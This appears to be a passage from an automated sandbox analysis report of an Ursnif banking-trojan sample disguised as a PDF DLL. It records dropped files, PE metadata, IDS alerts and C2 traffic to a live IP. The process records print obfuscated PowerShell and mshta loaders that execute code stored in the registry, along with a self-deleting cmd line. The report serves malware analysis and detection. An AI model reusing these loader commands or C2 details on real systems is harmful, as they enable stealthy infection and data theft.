                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1369
                      Entropy (8bit):5.38941265664502
                      Encrypted:false
                      SSDEEP:24:BxSAs7vBVLEZx2DOXUWxA+LCHcuI4qW3rHjeTKKjX4CIym1ZJX+A+LCHcuI41nxD:BZAvTLkoORSct4t3rqDYB1ZQSct4pZZ9
                      MD5:D9093AED9770C375F369883F57265233
                      SHA1:0726E4AB10F9CFB6CD04081A67150798319CB791
                      SHA-256:26F128A04C053E8AABB0E61617E0D02F8E418E0CA88E83E668071FA5974212CB
                      SHA-512:E8705514CC712818F52EBF05BA812475320069A556C8E0C86D40D3948BBFC793C7AF816E5A4D8C9457E0C62B8B2162CD6DE74FEC884692DDF62568BACD66D1A8
                      Malicious:false
                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220428154853..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 123716 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6636..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220428154853..**********************..PS>new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; t
                      Process:C:\Windows\explorer.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):232
                      Entropy (8bit):5.42163455994357
                      Encrypted:false
                      SSDEEP:6:QH51se4itKzTHLgyKBM34H6sw83F1tu4r9iyeqmM:Q7se4hzjLgyaI4HRlA4cyeHM
                      MD5:70E01C3AEC813421C5432829211FF0E5
                      SHA1:DFBBDD9C71D466333E270EFC575D89FE6DDA7605
                      SHA-256:B64921C4F67BC033A6FEC1581A35C76C5DC74EF9189DDCB35D55949D018E41A1
                      SHA-512:5EC463A9C601E5CBCAB88E5D478C9E04FA49420E5A51ACCA197A042CEC668C203B20D350A134F840A48808CA3B15BD33064AF51F5B3D22C13E0AEDCC5B5ED965
                      Malicious:false
                      Preview:new-alias -name dvjacwsnv -value gp;new-alias -name birkodkre -value iex;birkodkre ([System.Text.Encoding]::ASCII.GetString((dvjacwsnv "HKCU:\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Process:C:\Windows\explorer.exe
                      File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                      Category:dropped
                      Size (bytes):838
                      Entropy (8bit):3.073236880282747
                      Encrypted:false
                      SSDEEP:12:8glVm/3BVSXvk44X3ojsqzKtnWNaVgiNL4t2Y+xIBjK:8p/BHYVKVWiV57aB
                      MD5:CA1C201059C5BFD5900F5EB2466883CC
                      SHA1:BF3670A8C06A4FABC5C410F368E178B353F9166C
                      SHA-256:E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085
                      SHA-512:2273AF46D41B9698B23AEADD8EFBEF80017CFD465B4347CFB99C2FEAE371F39A511288AA64AAFA2E35DD2AD883D8E43D70A65E62C18977C6C6D85E3153041D4C
                      Malicious:false
                      Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....Z.1...........System32..B............................................S.y.s.t.e.m.3.2.....t.1...........WindowsPowerShell.T............................................W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l... .N.1...........v1.0..:............................................v.1...0.....l.2...........powershell.exe..N............................................p.o.w.e.r.s.h.e.l.l...e.x.e...........\.p.o.w.e.r.s.h.e.l.l...e.x.e.........%...............wN....]N.D...Q..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................
                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):6.102128737370747
                      TrID:
                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                      • Generic Win/DOS Executable (2004/3) 0.20%
                      • DOS Executable Generic (2002/1) 0.20%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:626a97fea05c8.pdf.dll
                      File size:618496
                      MD5:76f9a5c65f372960c55a3e2d19d211cb
                      SHA1:341d52557b6600d3e3fe30a43de94206eb4e4403
                      SHA256:713cfe3bc8dd8f8ba3b907d9268d3f4bd40f5a6a681653cc7922bf69a754ee5a
                      SHA512:d38596650718f4060bc63ddc1fda8ff4cec3550d2781cf12f790be9b858c4f9e65c8406dc17d95b8fb84689e3c028c4e225f74d613b0e92daf25e6be2526b420
                      SSDEEP:6144:eBbkmU1vOuplJjdX8vxxaYuQ1n79lmdrjhXccbwD1Yl/R0odd6MbBCKaDaabuFGs:iUJVpXjcgQ1n7DQjbES/OodJ+xS
                      TLSH:E7D4E029C7501A6AD81537791899803F0A39F978E32F70EF26847D6FB50A6F05A34F39
                      File Content Preview:MZ......................@...................................,...........!..L.!This program cannot be run in DOS mode....$........I.R.(n..(n..(n......(n..z...(n..P...(n.fLj..(n..vl..(n..z...(n..P...(n.._...(n..z...(n..z...(n......(n.fLk..(n..z...(n..z...(n
                      Icon Hash:9068eccc64f6e2ad
                      Entrypoint:0x401023
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:de44747c447d17324a209c20a63c5698
                      Programming Language:
                      • [IMP] VS2012 UPD4 build 61030
                      • [ C ] VS2013 UPD2 build 30501
                      • [IMP] VS2013 UPD3 build 30723
                      • [IMP] VS2010 SP1 build 40219
                      • [C++] VS2013 build 21005
                      • [RES] VS2008 build 21022
                      • [IMP] VS2013 build 21005
                      • [LNK] VS2015 UPD3.1 build 24215
                      • [EXP] VS2008 build 21022
                      • [ C ] VS2013 UPD3 build 30723
                      • [C++] VS2017 v15.5.4 build 25834
                      • [RES] VS2013 build 21005
                      • [ C ] VS2017 v15.5.4 build 25834
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8a000 | 0xa0 | .idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8b000 | 0xc100 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x98000 | 0x1010 | .reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x40000 | 0x38 | .rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x8a2ac | 0x20c | .idata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x1000 | 0x3efe0 | 0x3f000 | False | 0.37589905754 | data | 4.45973641251 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rdata | 0x40000 | 0x3fb5f | 0x40000 | False | 0.815296173096 | data | 7.22909869521 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data | 0x80000 | 0x9537 | 0x7000 | False | 0.327253069196 | data | 5.46985224262 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .idata | 0x8a000 | 0x98d | 0x1000 | False | 0.2060546875 | data | 2.48883672307 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .rsrc | 0x8b000 | 0xc100 | 0xd000 | False | 0.465106670673 | data | 5.38059585556 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc | 0x98000 | 0x17d7 | 0x2000 | False | 0.237915039062 | data | 3.90488138375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      Name | RVA | Size | Type | Language | Country
                      RT_BITMAP | 0x8b510 | 0x666 | data | English | United States
                      RT_ICON | 0x8bb78 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                      RT_ICON | 0x903d8 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States
                      RT_ICON | 0x92980 | 0xea8 | data | English | United States
                      RT_ICON | 0x93828 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                      RT_ICON | 0x940d0 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                      RT_DIALOG | 0x94638 | 0xb4 | data | English | United States
                      RT_DIALOG | 0x946f0 | 0x120 | data | English | United States
                      RT_DIALOG | 0x94810 | 0x158 | data | English | United States
                      RT_DIALOG | 0x94968 | 0x202 | data | English | United States
                      RT_DIALOG | 0x94b70 | 0xf8 | data | English | United States
                      RT_DIALOG | 0x94c68 | 0xa0 | data | English | United States
                      RT_DIALOG | 0x94d08 | 0xee | data | English | United States
                      RT_GROUP_ICON | 0x94df8 | 0x4c | data | English | United States
                      RT_VERSION | 0x94e48 | 0x290 | MS Windows COFF PA-RISC object file | English | United States
                      DLL | Import
                      msvcrt.dll | fgetwc, strcoll, srand
                      GDI32.dll | GetBkColor, ExtSelectClipRgn, GetTextMetricsW, GetCharWidthFloatA, GetCharWidth32A, GetTextCharacterExtra, GetCharWidthA, GdiComment
                      KERNEL32.dll | GetStringTypeA, WriteProcessMemory, GetCommTimeouts, GetConsoleCP, EnumResourceTypesA, GlobalFlags, GetFileTime, GetThreadLocale, LocalHandle, GetLargestConsoleWindowSize, EraseTape, GetDiskFreeSpaceExA, lstrlenA, GlobalMemoryStatus, GetModuleFileNameA, GetBinaryTypeA, DebugBreak
                      ADVAPI32.dll | RegGetValueA, GetFileSecurityA, EnumServicesStatusExW, InitiateSystemShutdownExW
                      mscms.dll | GetColorDirectoryW
                      USER32.dll | GetClientRect, GetClassNameA, GetPropW, GetScrollBarInfo, DeleteMenu, MessageBoxIndirectW, GetMenuItemRect, GetMessagePos, DefMDIChildProcW, GetUpdateRgn, LoadMenuA, GetQueueStatus, GetMessageW
                      OLEAUT32.dll | LoadTypeLibEx, GetRecordInfoFromTypeInfo
                      Description | Data
                      LegalCopyright | A Company. All rights reserved.
                      InternalName |
                      FileVersion | 1.0.0.0
                      CompanyName | A Company
                      ProductName |
                      ProductVersion | 1.0.0.0
                      FileDescription |
                      OriginalFilename | myfile.exe
                      Translation | 0x0409 0x04b0
                      Language of compilation system | Country where language is spoken | Map
                      English | United States |
                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                      04/28/22-15:48:15.506658 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49745 | 80 | 192.168.2.6 | 13.107.42.16
                      04/28/22-15:48:37.609595 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49750 | 80 | 192.168.2.6 | 94.140.115.8
                      • 94.140.115.8
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      0 | 192.168.2.6 | 49750 | 94.140.115.8 | 80 | C:\Windows\SysWOW64\rundll32.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Apr 28, 2022 15:48:35.804402113 CEST | 1147 | OUT | GET /drew/LtgGoR4W/2VkXik7fjDcVktkLvg4IApw/X92UzCdVgy/XGxL6WnODxABmAmav/eQYJObhAwpfD/VdmVLoyMEHz/dwiltyOKA4QHrd/HIJmqKTpq7hYAhh7xdD_2/BebjcoubFQh657nc/ksw26clyZ6v7ljU/oLbDPDTt1qYXqZfF_2/Fct2ocSBw/YaWKTOq17vIwu56czhmj/mDU1dku9eqq5aKu5F_2/FjqClysn2ko_2Fsx8SaFZF/ugZkpFnnMo_2B/poGcHSuZrc7hSygj/D8.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 94.140.115.8
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Apr 28, 2022 15:48:36.234626055 CEST | 1149 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.14.2
                      Date: Thu, 28 Apr 2022 13:48:36 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 186004
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="626a9b342b5f5.bin"
                      Apr 28, 2022 15:48:37.609595060 CEST | 1344 | OUT | GET /drew/NiEEiC_2F3/2h7kr_2B2M1EBpHcH/ENyHLalFXmOl/_2FTW0ecUVe/3N7nldlK89kw4y/VYeID7sRLB3A_2FAgFg0G/a5El_2BO7WD36Nlp/el4uE7tHR4Z8M9p/QG4TJaEWODl3HaYCH4/kP01txLgC/1iGXgYXBwcTcIgoIP92G/0JSXT0rNb0xnVvZFyXY/gCk_2F7aTYUhOqcRrdrBn4/EZOQnHcHRUgv3/B5BfYkj9/KpyjZ64W8U3keBpCjw85kZ4/8t_2Bri7RNBUNE3Y/8jsFDn.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 94.140.115.8
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Apr 28, 2022 15:48:38.002393961 CEST | 1352 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.14.2
                      Date: Thu, 28 Apr 2022 13:48:37 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 238744
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="626a9b35e6741.bin"
                      Apr 28, 2022 15:48:38.721512079 CEST | 1606 | OUT | GET /drew/lAbS1TW8Ry8K_2Fy_2F02/IsWfDHUCh87tGSw4/6lgCxLe1Qs4WPGx/DknDiIGwAkcSSAjTq_/2BfvJx7dx/1hlTGDAg0PRAb8RWrNXa/OnwJqcZ0UkVEA4nNNEX/rU_2BEpbIQ3L_2FTXhvUWT/8ZfWEtxix63AY/iFey05B2/gKLIqEyGvdF_2FQqfOcIngQ/d4nr47OKVK/s16bIA5z3PH2z3706/OF3C_2BAmDzq/p9S3fF0IaVA/8GI4MffuRsVQDp/0oN_2BdvJJV7wESzGZsla/_2FLi.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 94.140.115.8
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Apr 28, 2022 15:48:39.140155077 CEST | 1607 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.14.2
                      Date: Thu, 28 Apr 2022 13:48:39 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1865
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="626a9b3710e01.bin"



                      Target ID:0
                      Start time:15:47:43
                      Start date:28/04/2022
                      Path:C:\Windows\System32\loaddll32.exe
                      Wow64 process (32bit):true
                      Commandline:loaddll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll"
                      Imagebase:0xed0000
                      File size:116736 bytes
                      MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:2
                      Start time:15:47:43
                      Start date:28/04/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1
                      Imagebase:0xed0000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:4
                      Start time:15:47:44
                      Start date:28/04/2022
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1
                      Imagebase:0xf10000
                      File size:61952 bytes
                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424373972.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424240322.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.475301685.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424606218.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.601015727.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.472906954.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424163423.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424658030.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.599055996.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424644302.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424536633.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.476686328.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.599465657.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.475223060.0000000004DCA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.475254135.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.424457867.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      Target ID:17
                      Start time:15:48:42
                      Start date:28/04/2022
                      Path:C:\Windows\System32\mshta.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dgvy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dgvy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Imagebase:0x7ff74c6b0000
                      File size:14848 bytes
                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:18
                      Start time:15:48:46
                      Start date:28/04/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jehbycm -value gp; new-alias -name tyfittgwsr -value iex; tyfittgwsr ([System.Text.Encoding]::ASCII.GetString((jehbycm "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Imagebase:0x7ff620040000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      Target ID:19
                      Start time:15:48:46
                      Start date:28/04/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6406f0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:20
                      Start time:15:49:00
                      Start date:28/04/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline
                      Imagebase:0x7ff61dca0000
                      File size:2739304 bytes
                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      Target ID:22
                      Start time:15:49:03
                      Start date:28/04/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4ECA.tmp" "c:\Users\user\AppData\Local\Temp\pyir2nwc\CSC3492E89F885A4D28ABE1C8363667B7D.TMP"
                      Imagebase:0x7ff6c2e40000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Target ID:23
                      Start time:15:49:04
                      Start date:28/04/2022
                      Path:C:\Windows\System32\control.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\control.exe -h
                      Imagebase:0x7ff772ce0000
                      File size:117760 bytes
                      MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000017.00000000.543939686.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000017.00000000.542346452.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000017.00000000.544562349.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      Target ID:24
                      Start time:15:49:08
                      Start date:28/04/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.cmdline
                      Imagebase:0x7ff61dca0000
                      File size:2739304 bytes
                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      Target ID:26
                      Start time:15:49:10
                      Start date:28/04/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6B2B.tmp" "c:\Users\user\AppData\Local\Temp\vx43imot\CSCE0D7D73128344F6AB96E56EC2E032.TMP"
                      Imagebase:0x7ff6c2e40000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:27
                      Start time:15:49:16
                      Start date:28/04/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff77c400000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:29
                      Start time:15:49:30
                      Start date:28/04/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a97fea05c8.pdf.dll
                      Imagebase:0x7ff6edbd0000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Target ID:30
                      Start time:15:49:32
                      Start date:28/04/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6406f0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
